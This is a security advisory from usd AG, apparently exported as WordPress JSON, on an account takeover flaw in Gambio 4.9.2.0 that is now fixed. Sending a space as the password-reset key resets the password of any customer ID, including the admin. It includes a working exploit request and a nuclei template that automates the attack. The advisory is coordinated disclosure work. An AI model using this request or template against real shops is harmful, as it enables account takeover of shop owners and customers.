{"id":22531,"date":"2024-04-30T07:08:17","date_gmt":"2024-04-30T05:08:17","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2024-0002\/"},"modified":"2024-05-03T15:59:56","modified_gmt":"2024-05-03T13:59:56","slug":"usd-2024-0002","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2024-0002\/","title":{"rendered":"usd-2024-0002"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.25.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2024-0002 | Gambio 4.9.2.0 - Account Takeover<\/h1>\n

<\/h1>\n

Product<\/strong>: Gambio
Affected Version<\/strong>: 4.9.2.0 (with Security Update 2024-01 v1.0)
Vulnerability Type<\/strong>: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
Security Risk<\/strong>: Critical
Vendor URL<\/strong>: https:\/\/www.gambio.de\/<\/a>
Vendor Status<\/strong>: Fixed
CVE number<\/strong>: Pending<\/p>\n

Description<\/h3>\n

Gambio is a software program that is specifically designed for running online shops.
It provides various features and tools to help businesses manage their inventory, process orders, and handle customer interactions.<\/p>\n

According to their homepage, the software is used by more then 25.000 shops.<\/p>\n

The password reset functionality checks for the existence of a password recovery token.
However, this check can be bypassed with a space character (\"%20\").<\/p>\n

Proof of Concept<\/h3>\n

The password reset functionality utilizes the password_double_opt.php<\/strong> file with multiple possible actions defined in the \"action\" parameter.
The file loads the PasswordDoubleOptContentControl.inc.php<\/strong> file and executes the proceed<\/strong> method.<\/p>\n

If the action is set to save_password<\/strong>, a database query is performed to fetch the customer specified in the POST parameter customers_id<\/strong> with the reset token defined in the key<\/strong> parameter.
Attackers can submit the customers_id<\/strong> as an integer, where the initial admin account usually has the id set to \"1\".<\/p>\n

In line 138 of the PasswordDoubleOptContentControl.inc.php<\/strong> file, the application checks if the previous database query returns results, or if the key is an empty string.<\/p>\n

\n
<\/span>[...]
<\/span>if (!xtc_db_num_rows($check_customer_query) || $this->v_data_array['POST']['key'] == \"\")
{<\/span>    $case = 'no_account';<\/span>} 
else 
{<\/span>    $newpass = $this->v_data_array['POST']['newPassword'];
<\/span>[...]<\/span><\/pre>\n<\/div>\n
The If-Statement shown in line 1 of the snippet above, can be bypassed to return \"false\", by submitting a space character (\"%20\") as the key.
The password provided in the request is set without knowing the key to the customer defined in customers_id.<\/p>\n
An example request is shown below:<\/p>\n
\n
<\/span>POST<\/span> \/password_double_opt.php?action=save_password<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost<\/span>[...]

<\/span>newPassword=changeme2&confirmedPassword=changeme2&customers_id=1&key=%20<\/pre>\n<\/div>\n
A nuclei template was created to test for the vulnerability:<\/p>\n
\n
<\/span>id<\/span>:<\/span> <\/span>gambio-account-takeover
<\/span>info<\/span>:<\/span>  
<\/span>name<\/span>:<\/span> <\/span>Account Takeover in Gambio<\/span>  
<\/span>description<\/span>:<\/span> <\/span>Account Takeover in Gambio<\/span>  
<\/span>tags<\/span>:<\/span> <\/span>gambio,php,intrusive<\/span>  
<\/span>author<\/span>:<\/span> <\/span>ChristianPoeschl,EdwinHoffmann<\/span>  
<\/span>severity<\/span>:<\/span> <\/span>critical
<\/span>variables<\/span>:<\/span>  
<\/span>customerid<\/span>:<\/span> <\/span>1<\/span>  
<\/span>password<\/span>:<\/span> <\/span>\"somethingreallylong123\"
<\/span>http<\/span>:<\/span>  
<\/span>-<\/span> <\/span>raw<\/span>:<\/span>    
<\/span>-<\/span> <\/span>|<\/span>      
<\/span>POST \/password_double_opt.php?action=save_password HTTP\/1.1<\/span>      
<\/span>Host: {{Hostname}}<\/span>      
<\/span>Content-Type: application\/x-www-form-urlencoded<\/span>      
<\/span>newPassword={{password}}&confirmedPassword={{password}}&customers_id={{customerid}}&key=%20<\/span>    
<\/span>matchers-condition<\/span>:<\/span> <\/span>and<\/span>    
<\/span>matchers<\/span>:<\/span>      
<\/span>-<\/span> <\/span>type<\/span>:<\/span> <\/span>status<\/span>        
<\/span>status<\/span>:<\/span>          
<\/span>-<\/span> <\/span>302<\/span>      
<\/span>-<\/span> <\/span>type<\/span>:<\/span> <\/span>word<\/span>        
<\/span>part<\/span>:<\/span> <\/span>header<\/span>        
<\/span>words<\/span>:<\/span>          
<\/span>-<\/span> <\/span>\"GXsid_\"<\/span><\/pre>\n<\/div>\n
Fix<\/h3>\n
The password reset token should be properly validated.<\/p>\n
References<\/h3>\n
https:\/\/www.gambio.de<\/a><\/p>\n
Timeline<\/h3>\n
2024-01-17: Vulnerability identified by Christian Poeschl and Edwin Hoffmann.
2024-01-26: First contact request via email to info@gambio.de<\/a> .
2024-01-26: Received an update by Gambio that the incident is in internal review and will be fixed in an upcoming release.
2024-02-14: Gambio 4.9.2.1 fixes this issue.
2024-04-24: This advisory is published.<\/p>\n
Credits<\/h3>\n
This security vulnerability was identified by Christian Poeschl, Edwin Hoffmann of usd AG.<\/p>\n
[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
usd-2024-0002 | Gambio 4.9.2.0 - Account Takeover Product: GambioAffected Version: 4.9.2.0 (with Security Update 2024-01 v1.0)Vulnerability Type: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)Security Risk: CriticalVendor URL: https:\/\/www.gambio.de\/Vendor Status: FixedCVE number: Pending Description Gambio is a software program that is specifically designed for running online shops.It provides various features and tools to help businesses […]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-22531","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22531","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=22531"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22531\/revisions"}],"predecessor-version":[{"id":22554,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22531\/revisions\/22554"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=22531"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}